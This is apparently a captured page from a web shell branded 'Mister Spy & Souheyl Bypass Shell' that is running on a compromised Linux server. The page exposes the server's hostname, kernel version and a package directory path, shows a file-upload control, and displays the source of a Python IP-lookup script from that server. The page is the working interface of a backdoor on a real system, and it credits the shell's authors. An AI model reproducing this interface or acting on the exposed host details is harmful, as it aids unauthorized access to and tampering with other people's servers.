Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /usr/local/lib/python3.8/dist-packages/konto/base/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //usr/local/lib/python3.8/dist-packages/konto/base/ipinfo.py~

import os,re,sys,time

ipn = ""


class IPInfo(object):


    def __init__ (self):
        pass
        
        
    def analyze (self,pars):
    
    
        for zeile in sys.stdin:
            time.sleep(0.01)
            m = re.search(r"(\d+\.\d+\.\d+\.\d+)",zeile)
            if m:
                ipn = ipn + "," + m.group(1)
                os.system("curl https://ipinfo.io/" + m.group(1))

#*************************************************************************

if __name__ == "__main__":
#    print (sys.argv)
    IPInfo.__dict__["analyze"](IPInfo(),*sys.argv[1:])
        

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net